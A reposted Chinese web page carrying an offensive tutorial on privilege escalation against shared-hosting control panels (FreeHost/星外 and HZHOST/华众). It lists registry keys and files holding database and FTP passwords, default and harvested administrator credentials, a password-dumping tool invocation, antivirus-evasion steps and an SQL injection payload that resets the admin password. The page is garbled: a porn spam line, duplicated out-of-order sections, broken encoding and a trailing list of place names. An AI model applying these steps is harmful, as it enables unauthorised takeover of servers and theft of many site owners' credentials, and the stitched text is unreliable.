最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

滲透測(cè)試 - 華眾虛擬主機(jī)提權(quán) - cracer嗶哩嗶哩

2023-07-15 17:07 作者:鬼谷_衛(wèi)莊  | 我要投稿

華眾虛擬主機(jī)提權(quán)

?

0x21如何識(shí)別華眾主機(jī)

?

和星外識(shí)別差不多的方法,一般情況從目錄就可以看出:

絕大部分情況是D:\hzhost\

還有就是這種:e:\wwwroot\longzhihu\wwwroot\

其他的判斷方法就是看安裝目錄

C:\Program Files\

C:\Documents and Settings\All Users\「開始」菜單\程序

?

?

0x22敏感目錄及注冊(cè)表

  就經(jīng)驗(yàn)來說,一般是的溢出提權(quán)對(duì)虛擬主機(jī)是無果的,而且華眾又沒有星外那么明顯的漏洞。

  所以華眾提權(quán)關(guān)鍵之處就是搜集信息?。?!

主要注冊(cè)表位置:

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass? ? ?root密碼

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss? ? ? ?sa密碼

HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass? ??

你會(huì)發(fā)現(xiàn)他是用的自己的加密方法,然后利用華眾0day破解sa和root密碼

工具下載插我把?。?/p>

但是現(xiàn)在有些破解不錯(cuò)來,就得登錄管理后臺(tái)進(jìn)行密碼還原。虛擬主機(jī)管理目錄

D:\hzhost\hzhost_master\

一般來說是拿得到shell的。

?

然后利用和sa進(jìn)行提權(quán)就不詳解了,具體請(qǐng)參考法克論壇提權(quán)文集

插我下載?。?!

?

詳細(xì)的收集信息,請(qǐng)看文章:windows提權(quán)中敏感目錄和敏感注冊(cè)表的利用

?

主要敏感目錄:

c:\windows\temp下有hzhost主機(jī)留下的ftp登陸記錄。有用戶名和密碼

D:\hzhost\hzhost_master\? ? 虛擬主機(jī)管理網(wǎng)站,數(shù)據(jù)庫同樣存在sa和root密碼

?

0x23一些技巧和經(jīng)驗(yàn)

?

經(jīng)驗(yàn)+技巧一:

在華眾主機(jī)當(dāng)中有很大部分的mysql用戶可以跨庫到mysql這個(gè)庫。

在mysql這個(gè)庫中有root的密碼,所以當(dāng)遇到華眾主機(jī)的時(shí)候,如果主站是php架構(gòu)的,就找下配置文件,連接上數(shù)據(jù)庫,查看mysql中的中root密碼。

?

經(jīng)驗(yàn)+技巧二:

曲線提權(quán),先拿下HZHOST域名虛擬主機(jī)管理系統(tǒng)?。?!

首先通過旁站查詢和nmap端口掃描確定管理系統(tǒng)登錄界面。

HZHOST域名虛擬主機(jī)管理系統(tǒng)6.5及其以前版本都存在登錄框注入。

這里簡單介紹下,原文請(qǐng)點(diǎn)擊:HZHOST域名虛擬主機(jī)管理系統(tǒng)sql注射漏洞+進(jìn)一步利用

目前國內(nèi)大部分網(wǎng)站的現(xiàn)狀是建立在各大虛擬主機(jī)系統(tǒng)上,獨(dú)立服務(wù)器的站點(diǎn)是越來越少。

所以一旦獲取主機(jī)的最高權(quán)限就能掌握大量的站點(diǎn),而且虛擬主機(jī)又是那么變態(tài),提權(quán)基本很難。于是本菜本著授人與魚不如授人與漁為大家總結(jié),并分享給大家。

0x00 前言

  0x01什么是虛擬主機(jī)

  0x02神馬是安全模式

  0x03關(guān)于虛擬主機(jī)提權(quán)的一些話

0x10 星外主機(jī)提權(quán)

  0x11如何識(shí)別星外

  0x12常規(guī)星外提權(quán)

  0x13星外可讀可寫

  0x14其他思路星外提權(quán)

0x20華眾虛擬主機(jī)提權(quán)

  0x21如何識(shí)別華眾主機(jī)

  0x22敏感目錄及注冊(cè)表

  0x23一些技巧和經(jīng)驗(yàn)

0x30西部數(shù)碼提權(quán)

  0x31如何識(shí)別西部數(shù)碼

  0x32存放敏感信息位置

  0x33一些經(jīng)驗(yàn)

0x40 N點(diǎn)虛擬主機(jī)提權(quán)

  0x41識(shí)別N點(diǎn)虛擬主機(jī)

  0x42常規(guī)提權(quán)N點(diǎn)虛擬主機(jī)

  0x43相關(guān)資料

0x50其他常見虛擬主機(jī)提權(quán)

  0x51新網(wǎng)虛擬主機(jī)

  0x52 ZKEYS虛擬主機(jī)

  0x53其他不知名虛擬主機(jī)

?

0x00 前言

?

0x01什么是虛擬主機(jī)

?

  

  記得當(dāng)初才開始玩滲透的時(shí)候,很多牛牛就在群里說道“又提一個(gè)虛擬主機(jī)”。很好奇呀,什么是虛擬主機(jī)。這里介紹介紹。百科的解釋是每個(gè)“主機(jī)”都有獨(dú)立的域名,獨(dú)立的IP,就是我們所說的“空間”。而我們所常常見到的是虛擬主機(jī)上每個(gè)主機(jī)擁有獨(dú)立域名??偟膩碚f,在一臺(tái)服務(wù)器上存在多個(gè)域名就叫做虛擬主機(jī)(這樣解釋就有點(diǎn)牽強(qiáng))。常見的虛擬主機(jī)管理系統(tǒng)就是目錄中的那些~~~

?

0x02什么是安全模式

  安全模式是虛擬機(jī)管理系統(tǒng)一種常見的管理模式,其原理就是利用windows下的一些設(shè)置,控制權(quán)限。?

  安全模式如何判斷?一般虛擬主機(jī)都是支持aspx的,但是aspx馬的功能在安全模式下是不能完全發(fā)揮的。我們來看看安全模式下的配置:

  

  要做設(shè)置的web.config文件存在于:

  C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\中其中關(guān)鍵部分默認(rèn)不修改是這樣的

?

?

?請(qǐng)注意trust level=”Full”? :Full即是完全權(quán)限,是系統(tǒng)默認(rèn)設(shè)置,沒有任何限制的權(quán)限,可執(zhí)行aspx大馬,功能沒有限制??墒褂胊spx一句話連接。

Medium,權(quán)限配置為中,國內(nèi)大部分虛擬主機(jī)是這樣配置的,IIS中的應(yīng)用程序配置中存在aspx映射,但無法執(zhí)行任何aspx代碼,這樣就徹底的斷絕了aspx代碼的執(zhí)行。High,代碼訪問權(quán)限為高,此時(shí)可以執(zhí)行aspx大馬,但功能遭到限制,無法執(zhí)行命令、查看注冊(cè)表、系統(tǒng)進(jìn)程、系統(tǒng)服務(wù) 和使用IISSPY,一但執(zhí)行以上操作,錯(cuò)誤頁面。

所以安全模式下的判斷一般是通過aspx馬來判斷,一般是無法使用iisspy,無法使用aspxcmd,


?


<securityPolicy>


<trustLevel name="Full" policyFile="internal" />


<trustLevel name="High" policyFile="web_hightrust.config" />


<trustLevel name="Medium" policyFile="web_mediumtrust.config" />


<trustLevel name="Low" policyFile="web_lowtrust.config" />


<trustLevel name="Minimal" policyFile="web_minimaltrust.config" />


</securityPolicy>


<trust level="Full" originUrl="" />


?


無法讀取注冊(cè)表,也通常無法連接一句話、、、、很多變態(tài)的設(shè)置。

?


這里看一張使用iisspy出現(xiàn)錯(cuò)誤頁面的圖片:

\

更多關(guān)于執(zhí)行aspx Webshell時(shí)出現(xiàn)的錯(cuò)誤信息原理詳解

安全模式大部分是存在于星外主機(jī)上,其他主機(jī)出現(xiàn)較少~~~

?

0x03關(guān)于虛擬主機(jī)提權(quán)的一些話 www.***.com

  虛擬主機(jī)提權(quán)一般是比較蛋疼的,但是并不是提不下來,雖然我們木有0day,但是收集信息終究可能找到突破口。

  還有就是很多機(jī)油讓我?guī)兔μ釞?quán)時(shí),就說這個(gè)服務(wù)器不支持aspx,其實(shí)服務(wù)器是支持aspx的。很多虛擬主機(jī)的網(wǎng)站容器的設(shè)置一般就是asp和php一般是同時(shí)支持,aspx站點(diǎn)一般是單獨(dú)一個(gè)網(wǎng)站容器。所以就一定要拿下一個(gè)aspxshell,怎么找同服務(wù)器支持aspx的站點(diǎn)?我原來其實(shí)也說過,方法是利用bing搜索:ip:服務(wù)器ip? aspx

如圖:

\

0x10 星外主機(jī)提權(quán)

?

0x11如何識(shí)別星外

?

識(shí)別星外主機(jī),一般通過以下幾個(gè)來識(shí)別:

網(wǎng)站目錄識(shí)別,一般目錄中存咋freehost的基本都是星外

D:\freehost\xxxxx\

Phpinfo識(shí)別新建一個(gè)php:<?php phpinfo()?>打開后如下:

\

還有就是安裝目錄識(shí)別:

C:\Program Files\

C:\Documents and Settings\All Users\「開始」菜單\程序

這兩個(gè)目錄有明顯的星外安裝信息:

\

0x12常規(guī)星外提權(quán)

?

? ?大多數(shù)情況下各種本地提權(quán)exp一般是無果的。常規(guī)的星外的提權(quán)是利用星外使用自帶的ftp和默認(rèn)一個(gè)freehostrunat用戶(administrators組),所以一旦知道該用戶密碼就可以順利登錄了。

? ?首先找到可讀可寫目錄或者文件,上傳cmd和利用法客工具包中的星外讀IIS.exe

?

C:\Program Files\iiszj.com\log\> iis.exe -i

FreeHost ID:724

C:\Program Files\iiszj.com\log\> iis.exe -u 724

UserName:freehostrunat

Password: fa41328538d7be36e83ae91a78a1b16f!

?

如圖:

\

常規(guī)提權(quán)就是如此。

?

0x13星外可讀可寫

?

由上面可以知道,非安全模式的星外一旦找到可讀可寫基本上是秒殺。

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

C:\php\PEAR\

C:\Program Files\Zend\ZendOptimizer-3.3.0\?

C:\Program Files\Common Files\

C:\7i24.com\iissafe\log\?

C:\RECYCLER\

C:\windows\temp\

c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\

e:\recycler\

f:\recycler\

C:\Program Files\Symantec AntiVirus\SAVRT\

C:\WINDOWS\7i24.com\FreeHost

C:\php\dev

C:\~1\

C:\System Volume Information?

C:\Program Files\Zend\ZendOptimizer-3.3.0\docs

C:\Documents and Settings\All Users\DRM\

C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection

C:\Documents and Settings\All Users\Application Data\360safe\softmgr\

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll?

C:\7i24.com\LinkGate\log?

C:\7i24.com\serverdoctor\log\

C:\WINDOWS\Temp\

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

c:\Program Files\360\360Safe\deepscan\Section\mutex.db

c:\Program Files\Helicon\ISAPI_Rewrite3\error.log

c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log?

c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf?

c:\Program Files\Common Files\Symantec Shared\Persist.bak?

c:\Program Files\Common Files\Symantec Shared\Validate.dat?

c:\Program Files\Common Files\Symantec Shared\Validate.dat?

c:\windows\hchiblis.ibl?

C:\Program Files\Thunder Network\Thunder7\

C:\Program Files\Thunder Network\Thunder\

c:\windows\DriverPacks\C\AM2

C:\Program Files\FlashFXP\

?

紅色部分是我常用的一些目錄和一些log文件,這些文件并不一定要硬搬,一般是尋找log文件??!

?

上面的可讀可寫目錄同樣適用其他虛擬主機(jī)。

?

0x14其他思路星外提權(quán)

?

思路一:

但是事與愿違的是目前大部分虛擬主機(jī)基本都是安全模式~~~

如何突破?一般是只有通過第三方軟件提權(quán),常見的mssql,mysql和Navicat,如何找到mssql和mysql密碼,所以收集信息就十分重要。

HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11

星外存儲(chǔ)mssql密碼位置,解密后一般是無法連接,但是去可以用來社工。經(jīng)常碰見sa密碼和root密碼相同,當(dāng)然也可以試試直接用3389登錄下。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002

星外存貯ftp密碼的位置。同樣是用來收集信息。

navicat管理的MySQL服務(wù)器信息(一般是root帳戶)是存在注冊(cè)表里的,具體是:

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers

導(dǎo)出注冊(cè)表導(dǎo)入到本機(jī)然后星號(hào)察看就OK了。

還有就是:

navicat會(huì)把操作日志(比如加賬戶)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安裝目錄下的logs下LogHistory.txt

詳細(xì)的收集信息,請(qǐng)看文章:windows提權(quán)中敏感目錄和敏感注冊(cè)表的利用

?

思路二:

這里搜集了一些星外freehostrunat的一些密碼:

fa41328538d7be36e83ae91a78a1b16f!7? ? 默認(rèn)密碼

991b95d33a17713068403079d4fe40a4!7

83e0843d0091c43c4837bea224ebf197!7

7b41043919eec81c59f9eb95ac3bc456!7

4d91105ff31261b8a75a06c30002b09d!7

41328538d7be36e83ae91a78a1b16f!7

a0539224259d2494cde874f88fe86bff!7

5720969b84e8749764b39fa567331d80!7

a87997782e814aebb69b2cded123d642!7

fad7be36e83ae91a78a1b16f!7

be36e83ae91a78a1b16f!7

至于用來干什么,我想你會(huì)懂,反正我是這樣成功過~~~

?

新思路三:

當(dāng)找可讀可寫的目錄 有時(shí)候找到了可讀可寫的目錄也不一定能執(zhí)行。也是提示無權(quán)限 再說服務(wù)器雖然沒有了360,但是還有麥咖啡跟一流監(jiān)控呢,很多東西都無法上傳。

未加入過濾行列的程序直接刪了都。 大家都知道,在C:\Program Files的文件夾有一個(gè)winrar的目錄文件夾。

先用aspx大馬試探下rar能否執(zhí)行。

命令是:C:\Program Files\Winrar\rar.exe或unrar.exe 如果能夠正被執(zhí)行的說明還是有希望的。

在本地創(chuàng)建一個(gè)rar的壓縮包。包含星外exp、cmd。上傳到網(wǎng)站的根目錄。接著就是查找可寫目錄了。到了這里有的人可能會(huì)說。找到了可寫目錄不就可執(zhí)行了嗎。但有的情況可能你沒有遇到過,明明提示上傳成功了的,卻找不到了,有時(shí)會(huì)在執(zhí)行的時(shí)會(huì)還是提示沒有權(quán)限。接著在aspx上執(zhí)行rar.exe。釋放文件 例如:x d:\freehost\wwwroot\xx.rar C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index

\

這樣rar的文件就被釋放到了media index的目錄里。因?yàn)槭窃诜?wù)器上執(zhí)行的。很多殺軟不監(jiān)控。

接著就到aspx那執(zhí)行去了。順利拿到密碼。

?

新思路四:

找到星外管理網(wǎng)站:

一般是這些:

C:\freehostmain\? ? C:\freehostmain1\

D: \freehostmain\? ? D:\freehostmain1\

、、、、、

然后嘗試跳轉(zhuǎn)或者拿下這個(gè)管理端,F(xiàn)reeHostMain 文件夾(默認(rèn)是FreeHostMain),找到Global.asa文件,打開之后會(huì)看見如下代碼:

<SCRIPT LANGUAGE=VBScript RUNAT=Server> Sub Application_OnStart SQLPassword="abcd1234"'為了安全,請(qǐng)修改數(shù)據(jù)庫的登陸密碼為您自己的密碼,這個(gè)密碼可以在SQL2000企業(yè)管理器--安全性--登陸--FreeHost用戶屬性中設(shè)置。

如圖:

\

這就是星外的數(shù)據(jù)庫管理密碼,默認(rèn)賬號(hào)=FreeHost,密碼=abcd1234,然后用查詢分析器連接。數(shù)據(jù)庫中有大量的信息~~~神馬sa,root,ftp等密碼都有~~

\

serverlist 為虛擬主機(jī)服務(wù)器列表

serversqllist 為數(shù)據(jù)庫服務(wù)器列表

serverVPSlist 為VPS被控列表

\

servernam 為主機(jī)名稱site 為站點(diǎn)softtype 為數(shù)據(jù)庫類型IP 為IPadmpass 為數(shù)據(jù)庫密碼

這里數(shù)據(jù)庫密碼可以找到所有服務(wù)器的sa和root密碼,而且還是明文的!找到了就可以通過sa恢復(fù)組件進(jìn)行提權(quán)了。

接下來繼續(xù)找表 FreeHost_Admuser,這個(gè)是星外的后臺(tái)管理表段,密碼是 md5 加密。

\

通過nmap進(jìn)行掃描端口,找到http端口進(jìn)行嘗試打開,默認(rèn)后臺(tái)是adm

http://123.1*3.1*3.1*3:80/adm

當(dāng)然你在后臺(tái)也可以找到很多信息~~~

?

小技巧:

?

當(dāng)可讀可寫目錄存在空格的時(shí)候:

會(huì)出現(xiàn)這樣的情況:

'C:\Documents' 不是內(nèi)部或外部命令,也不是可運(yùn)行的程序

或批處理文件。

解決辦法是利用菜刀的交互shell切換到exp路徑,如:

Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目錄

然后再執(zhí)行exp或者cmd,就不會(huì)存在上面的情況了,aspshell一般是無法跳轉(zhuǎn)目錄的~~

看圖:

\

0x20華眾虛擬主機(jī)提權(quán)

?

0x21如何識(shí)別華眾主機(jī)

?

和星外識(shí)別差不多的方法,一般情況從目錄就可以看出:

絕大部分情況是D:\hzhost\

還有就是這種:e:\wwwroot\longzhihu\wwwroot\

其他的判斷方法就是看安裝目錄

C:\Program Files\

C:\Documents and Settings\All Users\「開始」菜單\程序

?

?

0x22敏感目錄及注冊(cè)表

  就經(jīng)驗(yàn)來說,一般是的溢出提權(quán)對(duì)虛擬主機(jī)是無果的,而且華眾又沒有星外那么明顯的漏洞。

  所以華眾提權(quán)關(guān)鍵之處就是搜集信息?。。?/p>

主要注冊(cè)表位置:

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass? ? ?root密碼

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss? ? ? ?sa密碼

HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass? ??

你會(huì)發(fā)現(xiàn)他是用的自己的加密方法,然后利用華眾0day破解sa和root密碼

工具下載插我把??!

但是現(xiàn)在有些破解不錯(cuò)來,就得登錄管理后臺(tái)進(jìn)行密碼還原。虛擬主機(jī)管理目錄

D:\hzhost\hzhost_master\

一般來說是拿得到shell的。

?

然后利用和sa進(jìn)行提權(quán)就不詳解了,具體請(qǐng)參考法克論壇提權(quán)文集

插我下載!??!

?

詳細(xì)的收集信息,請(qǐng)看文章:windows提權(quán)中敏感目錄和敏感注冊(cè)表的利用

?

主要敏感目錄:

c:\windows\temp下有hzhost主機(jī)留下的ftp登陸記錄。有用戶名和密碼

D:\hzhost\hzhost_master\? ? 虛擬主機(jī)管理網(wǎng)站,數(shù)據(jù)庫同樣存在sa和root密碼

?

0x23一些技巧和經(jīng)驗(yàn)

?

經(jīng)驗(yàn)+技巧一:

在華眾主機(jī)當(dāng)中有很大部分的mysql用戶可以跨庫到mysql這個(gè)庫。

在mysql這個(gè)庫中有root的密碼,所以當(dāng)遇到華眾主機(jī)的時(shí)候,如果主站是php架構(gòu)的,就找下配置文件,連接上數(shù)據(jù)庫,查看mysql中的中root密碼。

?

經(jīng)驗(yàn)+技巧二:

曲線提權(quán),先拿下HZHOST域名虛擬主機(jī)管理系統(tǒng)?。。?/p>

首先通過旁站查詢和nmap端口掃描確定管理系統(tǒng)登錄界面。

HZHOST域名虛擬主機(jī)管理系統(tǒng)6.5及其以前版本都存在登錄框注入。

這里簡單介紹下,原文請(qǐng)點(diǎn)擊:HZHOST域名虛擬主機(jī)管理系統(tǒng)sql注射漏洞+進(jìn)一步利用

\

\

存在注入:

123' UPDATE [memlst] SET u_pss='e10adc3949ba59abbe56e057f20f883e' WHERE u_nme='admin'--

這一句是把用戶admin的密碼修改為123456。管理員的后臺(tái)地址一般是http://www.xx.com/master或者直接在首頁登陸了按切換到管理員后臺(tái)。

?

登錄管理后臺(tái)后,可以通過數(shù)據(jù)庫操作拿shell

?

拿到shell同樣利用sa和root密碼進(jìn)行提權(quán)。



滲透測(cè)試 - 華眾虛擬主機(jī)提權(quán) - cracer嗶哩嗶哩的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國家法律
柞水县| 仙桃市| 西充县| 黄梅县| 诏安县| 永登县| 宁海县| 南京市| 巴彦淖尔市| 富源县| 盘山县| 平阴县| 天等县| 宣化县| 鲁甸县| 同江市| 嵊泗县| 宁津县| 海晏县| 万宁市| 哈巴河县| 上林县| 和龙市| 渭南市| 卫辉市| 怀来县| 偃师市| 合川市| 江永县| 阿城市| 津市市| 专栏| 遂宁市| 海盐县| 天长市| 伊宁市| 普安县| 会宁县| 无棣县| 怀安县| 凯里市|